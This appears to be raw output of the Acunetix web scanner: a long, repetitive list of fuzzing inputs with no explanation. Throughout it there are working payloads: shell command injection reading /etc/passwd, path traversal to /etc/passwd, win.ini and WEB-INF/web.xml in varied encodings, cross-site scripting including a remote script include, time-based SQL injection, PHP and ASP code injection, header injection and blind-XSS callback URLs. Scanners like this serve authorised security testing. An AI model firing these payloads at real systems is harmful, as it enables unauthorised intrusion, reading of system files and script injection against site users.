|cat /etc/passwd#

1<img/src=">" onerror=alert(948254)>

1

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'|'ld

1

1

eHNg7AKf'

1<ScRiPt%20>prompt(937679)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

"|"ld

1

testasp.vulnweb.com

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

QU6j17eM')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

1

1

4sMXc5QA'))

1

'

1

'

1

/etc/passwd

\xf6<img acu onmouseover=prompt(965264) //\xf6>

1

http://hitPoki1dAn3N.bxss.me/

1

1

-1

"

acunetix_wvs_invalid_filename

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(988716)>

1

1

1

comments

-1)

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

-1))

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

tbZgx480'

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

[url=http://www.acunetix.com]website security[/url]

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

MVlxKM4r')

1

'&dir&'

1_ketiM <ScRiPt >prompt(927203)</ScRiPt>

'"

1

1

1

bNv3BlpA'))

1'"()&%<ScRiPt >prompt(965939)</ScRiPt>

1

<!--

1

"&dir&"

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(907752)</ScRiPt>

1

1

1

1

1

|dir

1

1_982021

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

WEB-INF/web.xml

1

1

acu1846\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1846

1

"|dir

1

WEB-INF\web.xml

acux9758\xc0\xbez1\xc0\xbcz2a\x90bcxuca9758

1

1

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(968203)</ScRiPt>

1

1

1<script>prompt(916723)</script>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(944438)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912798></ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(938329)</ScRiPt>

1

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(956925)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914054)"></g></svg>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(927166))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1<body onload=prompt(900028)>

response.write(9834846*9181920)

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958681)>

'&cat /etc/passwd&'

1

'+response.write(9834846*9181920)+'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9834846*9181920)+"

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(979695)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img/src=">" onerror=alert(990885)>

1

cat /etc/passwd

-1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(951452)</sCripT>

1

${100230+99249}

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

|cat /etc/passwd#

1&n937140=v985936

-1))

1

1&lt

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

hYXGlnUP'

1

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(998804) //\xf6>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Moh1LcLK')

"|"ld

!(()&&!|*|*|

/etc/passwd

'"()

1<input autofocus onfocus=prompt(984559)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

^(#$!@#$)(()))******

hu4LADqv'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

"

'

1

-1

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

http://hitz8wjlyAqWa.bxss.me/

-1)

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

1_raYdY <ScRiPt >prompt(980798)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

1

1

&dir

1

3mn6QU4v'

comments/.

1

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

9dPL4KhA')

1

1

1

1

gKZPxIO2'))

1

http://www.acunetix.tst

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

'"

1

1

|dir

1'"()&%<ScRiPt >prompt(945336)</ScRiPt>

1

WEB-INF/web.xml

1

<!--

1

WEB-INF\web.xml

1

'|dir

'"()&%<ScRiPt >prompt(903785)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1_954861

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu8607\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8607

1

1

1

................windowswin.ini

acux3091\xc0\xbez1\xc0\xbcz2a\x90bcxuca3091

1

1

1

1<ScRiPt >prompt(953909)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(989395)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(924227)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987023></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(945422)</ScRiPt>

1

1

1

response.write(9120635*9506561)

1<video><source onerror="javascript:prompt(961157)">

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992497)"></g></svg>

'+response.write(9120635*9506561)+'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9120635*9506561)+"

1<div style=width:expression(prompt(958464))>

1

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1<body onload=prompt(995215)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99178+100229}

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975628)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(987352)>

1

1&n931621=v993272

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

)

1<img/src=">" onerror=alert(914614)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(934385)</sCripT>

!(()&&!|*|*|

'|'ld

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1&lt

^(#$!@#$)(()))******

/etc/passwd

testasp.vulnweb.com

"|"ld

AkB2suVN'

1

1

\xf6<img acu onmouseover=prompt(911467) //\xf6>

'"()

'

1

B1G769o0')

1

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(944550)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

TpSf6Pgx'))

'

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

<a href='http://www.acunetix.com'>website security</a>

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitSuvKpaa8ej.bxss.me/

1_QEBKc <ScRiPt >prompt(983365)</ScRiPt>

-1)

comments

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

'"

http://www.acunetix.tst

1

MTdVbIia'

'&dir&'

1

file:///etc/passwd

1

comments/.

1

g9RVdtra')

1

<!--

"&dir&"

1

Y6BLajEg'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(925063)</ScRiPt>

1

1

|dir

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(967859)</ScRiPt>

1

1

1

'|dir

1

WEB-INF\web.xml

1_918599

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8405\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8405

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

acux8838\xc0\xbez1\xc0\xbcz2a\x90bcxuca8838

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(950888)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(996226)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(907249)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907433></ScRiPt>

1

1

1

1<ScRiPt >prompt(997613)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(970034)">

1

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905254)"></g></svg>

1

1

1

1<div style=width:expression(prompt(956119))>

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(937864)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936278)>

1

1<img src=xyz OnErRor=prompt(974656)>

1

1

1<img/src=">" onerror=alert(925484)>

1

1<ScRiPt%20>prompt(981009)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(963011) //\xf6>

1

1<input autofocus onfocus=prompt(963227)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1_9wWMg <ScRiPt >prompt(992584)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9028060*9106319)

1

1

'+response.write(9028060*9106319)+'

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9028060*9106319)+"

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

${100476+99252}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&n907243=v919389

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

-1)

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

'|'ld

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1

deAOXyB3'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

R7tA8pEn')

1

http://hitk3GqO54QYn.bxss.me/

1

1

/etc/passwd

"

1

'

1

qClBByOR'))

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

1

-1

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1)

comments

1

http://www.acunetix.tst

||cat /etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1'"()&%<ScRiPt >prompt(994542)</ScRiPt>

comments

'"

-1))

1

&dir

1

<!--

comments/.

'"()&%<ScRiPt >prompt(976684)</ScRiPt>

aZ4Q52LD'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

A8G78dsi')

1_929858

1

1

1

"&dir&"

1

1

H0rqC5Jx'))

|dir

file:///etc/passwd

1

'|dir

1

acu3234\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3234

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

acux9937\xc0\xbez1\xc0\xbcz2a\x90bcxuca9937

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(954871)</ScRiPt>

WEB-INF\web.xml

1

1<script>prompt(904466)</script>

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(945938)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986899></ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(999930)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<video><source onerror="javascript:prompt(933968)">

response.write(9626483*9135934)

................windowswin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918682)"></g></svg>

'+response.write(9626483*9135934)+'

1

1<div style=width:expression(prompt(945330))>

..\..\..\..\..\..\..\..\windows\win.ini

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

1

"+response.write(9626483*9135934)+"

'&cat /etc/passwd&'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(950334)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959625)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

-1

1<img src=xyz OnErRor=prompt(911444)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99141+100071}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n938286=v917214

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(976409)>

1some_inexistent_file_with_long_name%00.jpg

-1))

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1

1<ScRiPt%20>prompt(959006)</sCripT>

1

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

wKuY5nbJ'

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&lt

1

testasp.vulnweb.com

'"()

rb7Iz46K')

1

'|'ld

1

\xf6<img acu onmouseover=prompt(967036) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

'

x1jjNinZ'))

1

1

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(977148)>

1

-1

"

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1)

<a href='http://www.acunetix.com'>website security</a>

1

'

1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

"

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_8RQvI <ScRiPt >prompt(904534)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

A3JtHaNm'

1

1

http://hitb1Qubc9ElE.bxss.me/

1

1

t9oIiaK8')

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

'&dir&'

'"

4eBNSL3U'))

http://www.acunetix.tst

1

"&dir&"

comments

file:///etc/passwd

1

1

1

<!--

1'"()&%<ScRiPt >prompt(995201)</ScRiPt>

|dir

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

'"()&%<ScRiPt >prompt(966042)</ScRiPt>

'|dir

1

1

1

1

1_912307

1

1

WEB-INF/web.xml

"|dir

1

acu10866\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10866

1

1

1

WEB-INF\web.xml

1

acux5906\xc0\xbez1\xc0\xbcz2a\x90bcxuca5906

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(921530)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(921064)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(925300)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916978></ScRiPt>

1

1

1<ScRiPt >prompt(999393)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(906181)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971273)"></g></svg>

1

1

1

response.write(9420325*9962089)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(929910))>

1

1

'+response.write(9420325*9962089)+'

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

"+response.write(9420325*9962089)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(922594)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941386)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(963152)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

${99566+100236}

1

-1

1<img/src=">" onerror=alert(981930)>

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(915196)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

`cat /etc/passwd`

-1)

1&lt

1

1

1&n954938=v985186

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

-1))

|cat /etc/passwd#

1

\xf6<img acu onmouseover=prompt(932311) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(924989)>

zcL3RtqI'

'|'ld

)

1

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

HLLqq047')

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

'"()

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

N2KVF6tH'))

'

1

1

1

1

/etc/passwd

"

-1

1_vjq08 <ScRiPt >prompt(906095)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

http://hiteDsila1Isx.bxss.me/

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

1

1

Ps6NPrbU'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

||cat /etc/passwd

1

tPrduRcf')

1

'"

comments

&dir

1

1

1

file:///etc/passwd

lBwbkNVl'))

<!--

1'"()&%<ScRiPt >prompt(927241)</ScRiPt>

1

1

'&dir&'

comments

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(930305)</ScRiPt>

1

1

1

comments/.

"&dir&"

1

1_994282

1

WEB-INF/web.xml

1

1

|dir

1

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu1478\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1478

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux8523\xc0\xbez1\xc0\xbcz2a\x90bcxuca8523

................windowswin.ini

1<ScRiPt >prompt(970673)</ScRiPt>

1

1

1

1<script>prompt(922651)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(960661)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925557></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(944703)</ScRiPt>

1

1

1

response.write(9215182*9157895)

1

1<video><source onerror="javascript:prompt(938891)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926448)"></g></svg>

1

1

WEB-INF/web.xml

'+response.write(9215182*9157895)+'

1

1

1<div style=width:expression(prompt(958696))>

&cat /etc/passwd&

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"+response.write(9215182*9157895)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(980228)>

1

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953252)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

${100354+100009}

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(967623)>

1

1

